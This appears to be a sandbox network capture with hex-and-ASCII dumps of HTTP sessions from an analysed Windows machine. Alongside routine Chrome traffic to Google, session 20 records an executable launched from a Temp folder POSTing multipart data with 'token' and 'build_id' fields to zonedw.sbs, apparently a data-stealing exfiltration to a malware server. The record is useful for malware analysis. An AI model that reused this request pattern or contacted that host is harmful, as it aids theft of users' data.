                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                18192.168.2.449895142.250.181.1324437292C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC518OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Version: 704583840
                                                                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:58 GMT
                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC372INData Raw: 31 63 34 36 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                Data Ascii: 1c46)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC1314INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 33 34 2c 33 37 30 30 34 33 39 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20
                                                                                                                                                                                                                                                Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700334,3700439,3700949,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC298INData Raw: 31 32 33 0d 0a 30 5c 6e 2a 2f 5c 6e 76 61 72 20 4c 64 3b 5f 2e 4a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 61 2e 6c 65 6e 67 74 68 3b 69 66 28 62 5c 75 30 30 33 65 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 4c 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 4b 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75
                                                                                                                                                                                                                                                Data Ascii: 1230\n*/\nvar Ld;_.Jd\u003dfunction(a){const b\u003da.length;if(b\u003e0){const c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Ld\u003dfunction(a){return new _.Kd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC1390INData Raw: 38 30 30 30 0d 0a 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4e 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 4f 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4e 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6e 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 50 64 5c 75 30 30 33 64 5b 4c 64 28 5c 22 64 61 74 61 5c 22 29 2c 4c 64 28 5c 22 68 74 74 70 5c 22 29 2c 4c 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 4c 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 4c 64
                                                                                                                                                                                                                                                Data Ascii: 8000trustedTypes;_.Nd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Od\u003dnew _.Nd(\"about:invalid#zClosurez\");_.Kd\u003dclass{constructor(a){this.nh\u003da}};_.Pd\u003d[Ld(\"data\"),Ld(\"http\"),Ld(\"https\"),Ld(\"mailto\"),Ld
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC1390INData Raw: 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 65 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72
                                                                                                                                                                                                                                                Data Ascii: 003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonce||b.getAttribute(\"nonce\")||\"\"};\n_.ee\u003dfunction(a){var
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC1390INData Raw: 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6f 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6f 65 5b 64 5d 2c 63 29 3a 5f 2e 6a 65 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e 6a 65 28 64 2c 5c 22 64 61 74 61 2d 5c 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 5c 75 30 30 33 64 63 7d 29 7d 3b 6f 65 5c 75 30 30 33 64 7b 63 65 6c 6c 70 61 64 64 69 6e
                                                                                                                                                                                                                                                Data Ascii: \u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:oe.hasOwnProperty(d)?a.setAttribute(oe[d],c):_.je(d,\"aria-\")||_.je(d,\"data-\")?a.setAttribute(d,c):a[d]\u003dc})};oe\u003d{cellpaddin


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                19192.168.2.449893142.250.181.1324437292C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Version: 704583840
                                                                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:58 GMT
                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                20192.168.2.449898116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:52:59 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----2VS2DJEKF37QQQQ90R1D
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 131557
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:52:59 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 32 56 53 32 44 4a 45 4b 46 33 37 51 51 51 51 39 30 52 31 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 32 56 53 32 44 4a 45 4b 46 33 37 51 51 51 51 39 30 52 31 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 32 56 53 32 44 4a 45 4b 46 33 37 51 51 51 51 39 30 52 31 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------2VS2DJEKF37QQQQ90R1DContent-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------2VS2DJEKF37QQQQ90R1DContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------2VS2DJEKF37QQQQ90R1DCont
                                                                                                                                                                                                                                                2024-12-13 12:52:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
